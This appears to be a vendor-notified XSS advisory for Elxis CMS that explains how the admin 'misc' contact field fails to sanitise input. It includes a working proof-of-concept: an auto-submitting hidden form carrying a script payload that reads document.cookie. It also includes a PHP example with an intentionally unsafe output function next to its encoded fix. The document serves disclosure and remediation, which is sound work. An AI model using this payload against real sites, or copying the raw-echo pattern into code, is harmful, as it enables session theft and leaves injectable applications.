Vulnerability ID: HTB22615
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_elxis_cms_contacts.html
Product: Elxis CMS
Vendor: Elxis Team ( http://www.elxis.org/ )
Vulnerable Version: 2009.2 electra rev2631 and probably prior versions
Vendor Notification: 20 September 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:

A user can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists because the "administrator/index2.php" script fails to properly sanitize user-supplied input in the "misc" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, or disclosure or modification of sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is available:

<form action="http://eecore/elxis/administrator/index2.php" method="post" name="main" >
<input type="hidden" name="catid" value="1" />
<input type="hidden" name="user_id" value="0" />
<input type="hidden" name="name" value="My Name" />
<input type="hidden" name="seotitle" value="sef-url" />
<input type="hidden" name="con_position" value="Website manager" />
<input type="hidden" name="email_to" value="webmaster@xxxxxxxxxxx" />
<input type="hidden" name="address" value="My address" />
<input type="hidden" name="suburb" value="city" />
<input type="hidden" name="state" value="reg" />
<input type="hidden" name="country" value="country" />
<input type="hidden" name="postcode" value="12345" />
<input type="hidden" name="telephone" value="123" />
<input type="hidden" name="fax" value="123" />
<!-- the unsanitized "misc" field carries the script payload -->
<input type="hidden" name="misc" value='hello"><script>alert(document.cookie)</script>' />
<input type="hidden" name="default_con" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="ordering" value="1" />
<input type="hidden" name="access" value="29" />
<input type="hidden" name="image" value="asterisk.png" />
<input type="hidden" name="params[menu_image]" value="-1" />
<input type="hidden" name="params[menu_image_only]" value="0" />
<input type="hidden" name="params[pageclass_sfx]" value="" />
<input type="hidden" name="params[print]" value="" />
<input type="hidden" name="params[back_button]" value="" />
<input type="hidden" name="params[name]" value="1" />
<input type="hidden" name="params[position]" value="1" />
<input type="hidden" name="params[email]" value="0" />
<input type="hidden" name="params[street_address]" value="1" />
<input type="hidden" name="params[suburb]" value="1" />
<input type="hidden" name="params[state]" value="1" />
<input type="hidden" name="params[country]" value="1" />
<input type="hidden" name="params[postcode]" value="1" />
<input type="hidden" name="params[telephone]" value="1" />
<input type="hidden" name="params[fax]" value="1" />
<input type="hidden" name="params[misc]" value="1" />
<input type="hidden" name="params[vcard]" value="1" />
<input type="hidden" name="params[image]" value="1" />
<input type="hidden" name="params[email_description]" value="1" />
<input type="hidden" name="params[email_description_text]" value="" />
<input type="hidden" name="params[email_form]" value="1" />
<input type="hidden" name="params[email_copy]" value="1" />
<input type="hidden" name="params[drop_down]" value="0" />
<input type="hidden" name="params[contact_icons]" value="1" />
<input type="hidden" name="params[icon_address]" value="" />
<input type="hidden" name="params[icon_email]" value="" />
<input type="hidden" name="params[icon_telephone]" value="" />
<input type="hidden" name="params[icon_fax]" value="" />
<input type="hidden" name="params[icon_misc]" value="" />
<input type="hidden" name="option" value="com_contact" />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="task" value="save" />
</form>
<!-- the form is submitted automatically when the page loads -->
<script>
document.main.submit();
</script>

Solution: Upgrade to the most recent version
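The defect described under Vulnerability Details, as an added example that is not Elxis code: a PHP rendering of the contact "misc" field that echoes the stored value raw, beside the attribute-encoded form that keeps the PoC value inert. The input markup, the function names and the sample value are assumptions; the advisory does not show the affected source of administrator/index2.php.

```php
<?php
// Added example, not Elxis source: how a stored "misc" value can break out
// of an HTML attribute, and the output encoding that prevents it. The
// field markup is an assumption about how the admin edit page echoes the
// saved value back.

// Constructed input, shaped like the advisory's PoC value for "misc".
const SAMPLE_MISC = 'hello"><script>alert(document.cookie)</script>';

// Vulnerable pattern: the stored value is echoed straight into a
// double-quoted attribute, so a leading '">' closes the attribute and the
// tag, and everything after it is parsed as markup.
function render_misc_unsafe(string $misc): string
{
    return '<input type="text" name="misc" value="' . $misc . '" />';
}

// Hardened pattern: encode for HTML attribute context before echoing.
// ENT_QUOTES encodes both ' and ", so the value cannot terminate the
// attribute whichever quote style the template uses; ENT_SUBSTITUTE keeps
// invalid UTF-8 from silently emptying the output.
function render_misc_safe(string $misc): string
{
    $encoded = htmlspecialchars($misc, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="misc" value="' . $encoded . '" />';
}

// Cheap regression check for a template test: a correctly encoded field
// contains exactly one tag opener (the <input itself); any further '<'
// means the value escaped the attribute.
function tag_opener_count(string $html): int
{
    return substr_count($html, '<');
}

$unsafe = render_misc_unsafe(SAMPLE_MISC);
$safe   = render_misc_safe(SAMPLE_MISC);
printf("unsafe: %s (tag openers: %d)\n", $unsafe, tag_opener_count($unsafe));
printf("safe:   %s (tag openers: %d)\n", $safe, tag_opener_count($safe));
```

The same encoding has to be applied at every place the saved field is displayed, the public contact page included, not only in the admin form that accepted it.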